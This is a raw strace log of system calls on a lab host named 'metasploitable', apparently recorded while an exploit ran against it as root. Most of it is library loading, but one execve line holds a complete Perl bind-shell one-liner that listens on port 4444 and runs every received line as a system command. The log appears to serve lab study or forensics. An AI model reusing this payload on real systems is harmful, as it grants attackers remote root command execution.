B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12391 07:42:12.869051 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12391 07:42:12.869068 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d89000

12391 07:42:12.869080 mmap2(0xb7d91000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d91000

12391 07:42:12.869096 close(1)          = 0

12391 07:42:12.869108 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12391 07:42:12.869121 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12391 07:42:12.869136 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12391 07:42:12.869225 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12391 07:42:12.869242 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7e000

12391 07:42:12.869253 mmap2(0xb7d87000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d87000

12391 07:42:12.869268 close(1)          = 0

12391 07:42:12.869289 munmap(0xb7f39000, 29913) = 0

12391 07:42:12.869304 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12391 07:42:12.869318 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12391 07:42:12.869330 _llseek(1, 0, [0], SEEK_CUR) = 0

12391 07:42:12.869341 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12391 07:42:12.869357 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f40000

12391 07:42:12.869368 _llseek(1, 1624, [1624], SEEK_SET) = 0

12391 07:42:12.869382 munmap(0xb7f40000, 1624) = 0

12391 07:42:12.869392 close(1)          = 0

12391 07:42:12.869421 getpgrp()         = 3831

12391 07:42:12.869431 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12391 07:42:12.869445 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12391 07:42:12.869462 brk(0x8101000)    = 0x8101000

12391 07:42:12.869537 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12391 07:42:12.869557 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12391 07:42:12.869572 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12391 07:42:12.869609 brk(0x8102000)    = 0x8102000

12391 07:42:12.869636 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12391 07:42:12.869654 stat64("/sbin/AB", 0xbf859ea8) = -1 ENOENT (No such file or directory)

12391 07:42:12.869666 stat64("/bin/AB", 0xbf859ea8) = -1 ENOENT (No such file or directory)

12391 07:42:12.869677 stat64("/usr/sbin/AB", 0xbf859ea8) = -1 ENOENT (No such file or directory)

12391 07:42:12.869689 stat64("/usr/bin/AB", 0xbf859ea8) = -1 ENOENT (No such file or directory)

12391 07:42:12.869702 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12391 07:42:12.869717 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db46f8) = 12392

12392 07:42:12.869764 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12392 07:42:12.869781 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12392 07:42:12.869794 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12392 07:42:12.869806 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12392 07:42:12.869823 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12392 07:42:12.869838 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12392 07:42:12.869851 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12392 07:42:12.869906 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12392 07:42:12.869919 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12392 07:42:12.870012 exit_group(127)   = ?

4519  07:42:12.900388 waitpid(12391,  <unfinished ...>

12391 07:42:12.900388 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12391 07:42:12.900389 --- SIGCHLD (Child exited) @ 0 (0) ---

12391 07:42:12.900389 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12392

12391 07:42:12.900389 waitpid(-1, 0xbf859b28, WNOHANG) = -1 ECHILD (No child processes)

12391 07:42:12.900389 sigreturn()       = ? (mask now [])

12391 07:42:12.900390 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12391 07:42:12.900390 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12391 07:42:12.900390 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12391 07:42:12.900400 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12391 07:42:12.900419 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12391 07:42:12.900430 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12391 07:42:12.900467 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12391 07:42:12.900487 stat64("/sbin/perl", 0xbf859ed8) = -1 ENOENT (No such file or directory)

12391 07:42:12.900499 stat64("/bin/perl", 0xbf859ed8) = -1 ENOENT (No such file or directory)

12391 07:42:12.900511 stat64("/usr/sbin/perl", 0xbf859ed8) = -1 ENOENT (No such file or directory)

12391 07:42:12.900523 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12391 07:42:12.900541 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12391 07:42:12.900566 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12391 07:42:12.900581 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db46f8) = 12393

12393 07:42:12.900662 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12393 07:42:12.900697 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12393 07:42:12.900710 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12393 07:42:12.900721 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12393 07:42:12.900738 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12393 07:42:12.900754 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12393 07:42:12.900767 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12393 07:42:12.900803 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12393 07:42:12.900893 brk(0)            = 0x8153000

12393 07:42:12.900920 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12393 07:42:12.900936 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f88000

12393 07:42:12.900952 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12393 07:42:12.900969 open("/etc/ld.so.cache", O_RDONLY) = 1

12393 07:42:12.900982 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12393 07:42:12.900999 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f80000

12393 07:42:12.901009 close(1)          = 0

12393 07:42:12.901019 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12393 07:42:12.901035 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12393 07:42:12.901053 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12393 07:42:12.901077 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12393 07:42:12.901077 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f7c000

12393 07:42:12.901078 mmap2(0xb7f7e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f7e000

12393 07:42:12.901078 close(1)          = 0

12393 07:42:12.901078 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12393 07:42:12.901078 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12393 07:42:12.902186 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12393 07:42:12.902353 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12393 07:42:12.902403 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f57000

12393 07:42:12.902433 mmap2(0xb7f7a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f7a000

12393 07:42:12.902462 close(1)          = 0

12393 07:42:12.902483 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12393 07:42:12.902497 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12393 07:42:12.902516 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12393 07:42:12.902603 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12393 07:42:12.902620 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f56000

12393 07:42:12.902632 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f3e000

12393 07:42:12.902643 mmap2(0xb7f52000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f52000

12393 07:42:12.902658 mmap2(0xb7f54000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f54000

12393 07:42:12.902671 close(1)          = 0

12393 07:42:12.902683 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12393 07:42:12.902696 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12393 07:42:12.902739 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12393 07:42:12.902845 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12393 07:42:12.902863 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7def000

12393 07:42:12.902874 mmap2(0xb7f38000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f38000

12393 07:42:12.902889 mmap2(0xb7f3b000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f3b000

12393 07:42:12.902903 close(1)          = 0

12393 07:42:12.902915 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12393 07:42:12.902928 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12393 07:42:12.902942 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12393 07:42:12.903035 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12393 07:42:12.903052 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dbd000

12393 07:42:12.903062 mmap2(0xb7dc6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dc6000

12393 07:42:12.903077 mmap2(0xb7dc8000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dc8000

12393 07:42:12.903090 close(1)          = 0

12393 07:42:12.903114 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dbc000

12393 07:42:12.903127 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dbc8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12393 07:42:12.903188 mprotect(0xb7f38000, 4096, PROT_READ) = 0

12393 07:42:12.903259 munmap(0xb7f80000, 29913) = 0

12393 07:42:12.903273 set_tid_address(0xb7dbc908) = 12393

12393 07:42:12.903283 set_robust_list(0xb7dbc910, 0xc) = 0

12393 07:42:12.903292 futex(0xbf897d30, 0x81 /* FUTEX_??? */, 1) = 0

12393 07:42:12.903307 rt_sigaction(SIGRTMIN, {0xb7f422c0, [], SA_SIGINFO}, NULL, 8) = 0

12393 07:42:12.903320 rt_sigaction(SIGRT_1, {0xb7f42340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12393 07:42:12.903332 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12393 07:42:12.903346 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12393 07:42:12.903365 uname({sys="Linux", node="metasploitable", ...}) = 0

12393 07:42:12.903411 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12393 07:42:12.903458 brk(0)            = 0x8153000

12393 07:42:12.903467 brk(0x8174000)    = 0x8174000

12393 07:42:12.903511 getuid32()        = 0

12393 07:42:12.903521 geteuid32()       = 0

12393 07:42:12.903530 getgid32()        = 0

12393 07:42:12.903539 getegid32()       = 0

12393 07:42:12.903576 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d9b000

12393 07:42:12.903602 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

12393 07:42:12.903619 read(1, "#\n\211\266", 4) = 4

12393 07:42:12.903635 close(1)          = 0

12393 07:42:12.903653 time(NULL)        = 1495626132

12393 07:42:12.903723 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbf897a00) = -1 ENOENT (No such file or directory)

12393 07:42:12.903766 stat64("/usr/local/lib/site_perl/5.8.8", 0xbf897a00) = -1 ENOENT (No such file or directory)

12393 07:42:12.903779 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbf897a00) = -1 ENOENT (No such file or directory)

12393 07:42:12.903795 stat64("/usr/local/lib/perl/5.8.7", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903808 stat64("/usr/local/share/perl/5.8.7", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903820 stat64("/usr/local/lib/perl/5.8.6", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903831 stat64("/usr/local/share/perl/5.8.6", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903843 stat64("/usr/local/lib/perl/5.8.4", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903855 stat64("/usr/local/share/perl/5.8.4", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903870 stat64("/usr/local/lib/perl/5.8.3", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903882 stat64("/usr/local/share/perl/5.8.3", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903893 stat64("/usr/local/lib/perl/5.8.2", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903905 stat64("/usr/local/share/perl/5.8.2", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903916 stat64("/usr/local/lib/perl/5.8.1", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903928 stat64("/usr/local/share/perl/5.8.1", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903940 stat64("/usr/local/lib/perl/5.8.0", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903951 stat64("/usr/local/share/perl/5.8.0", 0xbf897b40) = -1 ENOENT (No such file or directory)

12393 07:42:12.903974 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf897838) = -1 ENOTTY (Inappropriate ioctl for device)

12393 07:42:12.903988 _llseek(0, 0, [0], SEEK_CUR) = 0

12393 07:42:12.904000 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf897838) = -1 EBADF (Bad file descriptor)

12393 07:42:12.904010 _llseek(1, 0, 0xbf897880, SEEK_CUR) = -1 EBADF (Bad file descriptor)

12393 07:42:12.904021 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf897838) = -1 EINVAL (Invalid argument)

12393 07:42:12.904032 _llseek(2, 0, 0xbf897880, SEEK_CUR) = -1 ESPIPE (Illegal seek)

12393 07:42:12.904042 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

12393 07:42:12.904055 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf8978f8) = -1 ENOTTY (Inappropriate ioctl for device)

